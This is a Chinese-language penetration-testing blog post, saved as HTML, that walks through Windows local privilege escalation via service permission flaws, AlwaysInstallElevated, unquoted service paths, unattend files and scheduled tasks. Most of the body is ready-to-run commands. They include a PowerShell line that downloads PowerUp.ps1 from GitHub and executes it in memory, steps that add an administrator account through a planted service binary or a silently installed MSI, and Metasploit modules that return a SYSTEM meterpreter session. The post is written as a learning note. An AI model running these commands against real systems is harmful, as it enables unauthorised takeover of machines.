<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"sunian19.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.8.1","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>
<meta name="description" content="系统服务权限配置错误(目录可写) 漏洞原因：Windows操作系统中常见配置错误：如管理员凭证配置错误、服务配置错误、故意削弱的安全措施、用户权限过高等。 两种情况 1、服务未运行：攻击者会利用任意服务替换原来的服务，然后重启服务。 2、服务正在运行且无法被终止：这类情况符合大多数漏洞利用场景，通常利用DLL劫持技术并尝试重启服务来提权。">
<meta property="og:type" content="article">
<meta property="og:title" content="&#39;利用配置错误提权&#39;">
<meta property="og:url" content="https://sunian19.github.io/2020/07/14/%E5%88%A9%E7%94%A8%E9%85%8D%E7%BD%AE%E9%94%99%E8%AF%AF%E6%8F%90%E6%9D%83/index.html">
<meta property="og:site_name" content="zer0_c|imb&#39;s blog">
<meta property="og:description" content="系统服务权限配置错误(目录可写) 漏洞原因：Windows操作系统中常见配置错误：如管理员凭证配置错误、服务配置错误、故意削弱的安全措施、用户权限过高等。 两种情况 1、服务未运行：攻击者会利用任意服务替换原来的服务，然后重启服务。 2、服务正在运行且无法被终止：这类情况符合大多数漏洞利用场景，通常利用DLL劫持技术并尝试重启服务来提权。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://sunian19.github.io/imgss/p46.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/a53.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/a54.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/a55.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/a57.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/a58.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/a59.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/a60.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/a61.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/a62.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/a63.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/a64.png">
<meta property="article:published_time" content="2020-07-13T16:00:00.000Z">
<meta property="article:modified_time" content="2020-07-16T10:35:16.000Z">
<meta property="article:author" content="zer0_c|imb">
<meta property="article:tag" content="渗透测试">
<meta property="article:tag" content="提权">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://sunian19.github.io/imgss/p46.png">


<link rel="canonical" href="https://sunian19.github.io/2020/07/14/%E5%88%A9%E7%94%A8%E9%85%8D%E7%BD%AE%E9%94%99%E8%AF%AF%E6%8F%90%E6%9D%83/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://sunian19.github.io/2020/07/14/%E5%88%A9%E7%94%A8%E9%85%8D%E7%BD%AE%E9%94%99%E8%AF%AF%E6%8F%90%E6%9D%83/","path":"2020/07/14/利用配置错误提权/","title":"'利用配置错误提权'"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>'利用配置错误提权' | zer0_c|imb's blog</title>
  

  <script src="/js/third-party/analytics/baidu-analytics.js"></script>
  <script async src="https://hm.baidu.com/hm.js?48584c486973b4bf025a425c3d7b4007"></script>



  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">zer0_c|imb's blog</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#xi-tong-fu-wu-quan-xian-pei-zhi-cuo-wu-mu-lu-ke-xie"><span class="nav-number">1.</span> <span class="nav-text">系统服务权限配置错误(目录可写)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-power-up-xia-de-shi-zhan-li-yong"><span class="nav-number">1.1.</span> <span class="nav-text">1、PowerUp下的实战利用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-metasploit-xia-de-shi-zhan-li-yong"><span class="nav-number">1.2.</span> <span class="nav-text">2、Metasploit下的实战利用</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#zhu-ce-biao-jian-always-install-elevated"><span class="nav-number">2.</span> <span class="nav-text">注册表键AlwaysInstallElevated</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ke-xin-ren-fu-wu-lu-jing-lou-dong"><span class="nav-number">3.</span> <span class="nav-text">可信任服务路径漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#trusted-service-paths-lou-dong-cheng-yin"><span class="nav-number">3.1.</span> <span class="nav-text">Trusted Service Paths 漏洞成因</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#zi-dong-an-zhuang-pei-zhi-wen-jian"><span class="nav-number">3.2.</span> <span class="nav-text">自动安装配置文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ji-hua-ren-wu"><span class="nav-number">3.3.</span> <span class="nav-text">计划任务</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#empire-nei-zhi-mo-kuai"><span class="nav-number">3.4.</span> <span class="nav-text">Empire内置模块</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="zer0_c|imb"
      src="/imgss/touxiang.jpg">
  <p class="site-author-name" itemprop="name">zer0_c|imb</p>
  <div class="site-description" itemprop="description">忘川河畔彼岸花，红如鲜血似朱砂</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">89</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">39</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="mailto:lingyu195@gmail.com" title="E-Mail → mailto:lingyu195@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="tencent://AddContact/?fromId=45&fromSubId=1&subcmd=all&uin=3504078815" title="QQ → tencent:&#x2F;&#x2F;AddContact&#x2F;?fromId&#x3D;45&amp;fromSubId&#x3D;1&amp;subcmd&#x3D;all&amp;uin&#x3D;3504078815" rel="noopener" target="_blank"><i class="qq fa-fw"></i>QQ</a>
      </span>
  </div>


  <div class="links-of-blogroll site-overview-item animated">
    <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
      友情链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="http://www.ch4ser.top/" title="http:&#x2F;&#x2F;www.ch4ser.top&#x2F;" rel="noopener" target="_blank">ch4ser</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://hackergu.com/" title="http:&#x2F;&#x2F;hackergu.com&#x2F;" rel="noopener" target="_blank">Gu</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://al0neranger.github.io/" title="https:&#x2F;&#x2F;al0neranger.github.io&#x2F;" rel="noopener" target="_blank">al0neranger</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.cnblogs.com/lyshark" title="https:&#x2F;&#x2F;www.cnblogs.com&#x2F;lyshark" rel="noopener" target="_blank">lyshark</a>
        </li>
    </ul>
  </div>

        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://sunian19.github.io/2020/07/14/%E5%88%A9%E7%94%A8%E9%85%8D%E7%BD%AE%E9%94%99%E8%AF%AF%E6%8F%90%E6%9D%83/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/imgss/touxiang.jpg">
      <meta itemprop="name" content="zer0_c|imb">
      <meta itemprop="description" content="忘川河畔彼岸花，红如鲜血似朱砂">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zer0_c|imb's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          '利用配置错误提权'
        </h1>


        <div class="post-meta">
        
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2020-07-14 00:00:00" itemprop="dateCreated datePublished" datetime="2020-07-14T00:00:00+08:00">2020-07-14</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2020-07-16 18:35:16" itemprop="dateModified" datetime="2020-07-16T18:35:16+08:00">2020-07-16</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" itemprop="url" rel="index"><span itemprop="name">渗透测试</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>

      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="xi-tong-fu-wu-quan-xian-pei-zhi-cuo-wu-mu-lu-ke-xie" id="系统服务权限配置错误-目录可写">系统服务权限配置错误(目录可写)</h2>
<p>漏洞原因：Windows操作系统中常见配置错误：如管理员凭证配置错误、服务配置错误、故意削弱的安全措施、用户权限过高等。<br>
两种情况<br>
1、服务未运行：攻击者会利用任意服务替换原来的服务，然后重启服务。<br>
2、服务正在运行且无法被终止：这类情况符合大多数漏洞利用场景，通常利用DLL劫持技术并尝试重启服务来提权。</p>
<a id="more"></a>
<h3 id="1-power-up-xia-de-shi-zhan-li-yong" id="1、PowerUp下的实战利用">1、PowerUp下的实战利用</h3>
<p><a target="_blank" rel="noopener" href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1">https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1</a><br>
powerup提供了一些本地提权的方法，可通过很多实用脚本来查找目标机中的windows服务漏洞。</p>
<blockquote>
<p>可执行以下两条命令来运行该脚本<br>
1、powershell.exe -exec bypass -Command “&amp; {Import-Module .\PowerUp.ps1; Invoke-AllChecks}”<br>
2、powershell -nop -exec bypass -c “IEX(New-Object Net.WebClient).DownloadString(‘<a target="_blank" rel="noopener" href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1">https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1</a>’); Invoke-AllChecks”</p>
</blockquote>
<p>检测出漏洞后会在下面列出，如OmniServers服务漏洞(只是个示例，懒得搭环境了)<br>
<img src="/imgss/p46.png" alt=""><br>
AbuseFunction给出操作方式，利用Install-ServiceBinary模块，通过Write-ServiceBinary编写一个C#服务来添加用户<br>
powershell -nop -exec bypass -c &quot;IEX(New-Object Net.WebClient).DownloadString(‘c:/PowerUp.ps1’); Install-ServiceBinary -ServiceName ‘OmniServers’ -UserName shuteer -Password Password123!</p>
<h3 id="2-metasploit-xia-de-shi-zhan-li-yong" id="2、Metasploit下的实战利用">2、Metasploit下的实战利用</h3>
<blockquote>
<p>use exploit/windows/local/service_permissions<br>
options<br>
设置完成后run<br>
即可返回一个新的meterpreter<br>
(我这里没检测到洞，正常情况getuid显示NT AUTHORITY\SYSTEM)<br>
<img src="/imgss/a53.png" alt=""></p>
</blockquote>
<blockquote>
<p>模块讲解：<br>
利用两种方式获得system权限<br>
1、如果meterpreter以管理员权限运行，该模块会创建并运行一个新的服务；<br>
2、如果当前权限不允许创建服务，该模块会判断哪些服务的文件或文件夹的权限有问题，并允许对其进行劫持。<br>
在创建服务或者劫持已经存在的服务时，该模块会创建一个可执行程序，其文件名和安装路径都是随机的。</p>
</blockquote>
<h2 id="zhu-ce-biao-jian-always-install-elevated" id="注册表键AlwaysInstallElevated">注册表键AlwaysInstallElevated</h2>
<p>漏洞原因：<br>
gpedit.msc组策略、计算机配置(还有用户配置)、管理模板、windows组件、windows installer、永远以高特权进行安装<br>
<img src="/imgss/a54.png" alt=""><br>
设置完成后，会在注册表HKEY_CURRENT_USER和HKEY_LOCAL_MACHINE(就后面路径相同，见图)生成个数值AlwaysInstallElevated，数据为1的二进制值<br>
<img src="/imgss/a55.png" alt=""><br>
powershell -nop -exec bypass -c “IEX(New-Object Net.WebClient).DownloadString(‘c:/PowerUp.ps1’)”;Get-RegistryAlwaysInstallElevated<br>
<img src="/imgss/a57.png" alt=""><br>
利用write模块生成MSI文件<br>
powershell -nop -exec bypass -c “IEX(New-Object Net.WebClient).DownloadString(‘c:/PowerUp.ps1’)”;Write-UserAddMSI<br>
执行MSI文件添加用户<br>
msiexec /q /i UserAdd.msi<br>
PS：此操作会弹窗<br>
<img src="/imgss/a58.png" alt=""><br>
<img src="/imgss/a59.png" alt=""><br>
/q  安静模式，无用户交互<br>
/i  安装程序<br>
了解更多命令信息msiexec -h</p>
<p>也可使用msf的exploit/windows/local/always_install_elevated模块进行提权</p>
<h2 id="ke-xin-ren-fu-wu-lu-jing-lou-dong" id="可信任服务路径漏洞">可信任服务路径漏洞</h2>
<p>漏洞原因：服务调用可执行文件时没有正确的处理所引用的完整路径名(即服务调用的可执行文件的路径没有被双引号引起来且包含空格)，这个漏洞就可被攻击者用来上传任意可执行文件。<br>
两种情况<br>
1、如果路径与服务有关，就任意创建一个服务或者便宜service模板<br>
2、如果路径与可执行文件有关，就任意创建一个可执行文件</p>
<h3 id="trusted-service-paths-lou-dong-cheng-yin" id="Trusted-Service-Paths-漏洞成因">Trusted Service Paths 漏洞成因</h3>
<p>win服务一般以system权限运行，系统解析时，会对文件路径中的空格进行搜索<br>
如C:\Program Files\Some Folder\Service.exe服务运行时，都会寻找并执行空格前面的名字相匹配的程序，如下所示<br>
C:\Program.exe<br>
C:\Program Files\Some.exe<br>
C:\Program Files\Some Folder\Service.exe</p>
<p>使用msf进行利用</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic service get name,displayname,pathname,startmode|findstr &#x2F;i &quot;Auto&quot; |findstr &#x2F;i &#x2F;v &quot;C:\Windows\\&quot; |findstr&#x2F;i &#x2F;v &quot;&quot;&quot;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/a60.png" alt=""><br>
可以看到，有&quot;Vulnerable Service&quot;、“OmniServ”、“OmniServer”、“OmniServers&quot;四个服务对应的二进制文件路径没有引号包含起来，并且路径中包含空格。是存在该漏洞的，但在上传可执行文件进去之前，我们需要确定我们对目标文件夹是否有写入的权限<br>
使用windows内置工具icacls来检查&quot;C:\Program Files”、“C:\Program Files\Common Files”、&quot;C:\Program Files\Common Files\microsoftshared&quot;等目录的权限<br>
<img src="/imgss/a61.png" alt=""><br>
Everyone用户对这个文件有完全控制权，就是说所有用户都具有全部权限修改这个文件夹。<br>
M表示修改<br>
F代表完全控制<br>
CI代表从属容器将继承访问控制项<br>
OI代表从属文件将继承访问控制项</p>
<p>利用：把上传的程序重命名并放置在存在此漏洞且可写的目录下，重启服务<br>
sc stop service_name<br>
sc start service_name<br>
或使用msf的trusted_service_path模块<br>
不过反弹的新meterpreter会很快消失，使用命令自动进行迁移<br>
set AutoRunScript migrate -f<br>
或set autorunscript migrate -n explorer.exe</p>
<p>参考文章<br>
<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7261">https://xz.aliyun.com/t/7261</a><br>
<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/system/131388.html">https://www.freebuf.com/articles/system/131388.html</a></p>
<h3 id="zi-dong-an-zhuang-pei-zhi-wen-jian" id="自动安装配置文件">自动安装配置文件</h3>
<p>管理员可能使用脚本批量化部署文件，文件里可能包含本地管理账号密码信息<br>
可直接使用msf的post/windows/gather/enum_unattend模块</p>
<h3 id="ji-hua-ren-wu" id="计划任务">计划任务</h3>
<p>如果攻击者对以高权限运行的任务所在的目录具有写权限，就可以使用恶意程序覆盖原来的程序<br>
工具：accesschk，微软官方提供的工具，所以不会触发杀毒软件<br>
<a target="_blank" rel="noopener" href="https://docs.microsoft.com/zh-cn/sysinternals/downloads/accesschk">https://docs.microsoft.com/zh-cn/sysinternals/downloads/accesschk</a><br>
执行如下命令，查看目录的权限配置情况<br>
accesschk.exe -dqv “C:\Windows” -accepteula<br>
<img src="/imgss/a62.png" alt=""><br>
常用命令：<br>
第一次运行时会弹出许可协议对话框，使用以下命令自动接受<br>
accesschk.exe /accepteula<br>
列出某个驱动器下所有权限配置有缺陷的文件夹或文件</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">accesschk.exe -uwdqsUsers C:\</span><br><span class="line">accesschk.exe -uwdqs &quot;Administrator&quot; C:\</span><br><span class="line">accesschk.exe -uwdqsUsers C:\*.*</span><br><span class="line">accesschk.exe -uwdqs &quot;Administrator&quot; C:\*.*</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/a63.png" alt=""></p>
<h3 id="empire-nei-zhi-mo-kuai" id="Empire内置模块">Empire内置模块</h3>
<p>usemodule privesc/powerup/allchecks (Empire2.3)<br>
usemodule powershell/privesc/powerup/allchecks (Empire2.5)<br>
execute<br>
<img src="/imgss/a64.png" alt=""></p>
<p>Empire使用相关资料<br>
<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/87328">https://www.anquanke.com/post/id/87328</a><br>
<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/87333#h2-2">https://www.anquanke.com/post/id/87333#h2-2</a></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag"># 渗透测试</a>
              <a href="/tags/%E6%8F%90%E6%9D%83/" rel="tag"># 提权</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2020/07/14/%E7%BB%84%E7%AD%96%E7%95%A5%E9%A6%96%E9%80%89%E9%A1%B9%E6%8F%90%E6%9D%83%E4%B8%8EUAC%E7%BB%95%E8%BF%87/" rel="prev" title="'组策略首选项提权与UAC绕过'">
                  <i class="fa fa-chevron-left"></i> '组策略首选项提权与UAC绕过'
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2020/07/16/%E4%BB%A4%E7%89%8C%E7%9B%97%E5%8F%96%E6%8F%90%E6%9D%83%E4%B8%8E%E6%97%A0%E5%87%AD%E8%AF%81%E6%8F%90%E6%9D%83/" rel="next" title="'令牌盗取提权与无凭证(LLMNR和NetBIOS欺骗攻击)提权'">
                  '令牌盗取提权与无凭证(LLMNR和NetBIOS欺骗攻击)提权' <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zer0_c|imb</span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  
<script src="https://cdn.jsdelivr.net/npm/hexo-generator-searchdb@1.4.0/dist/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
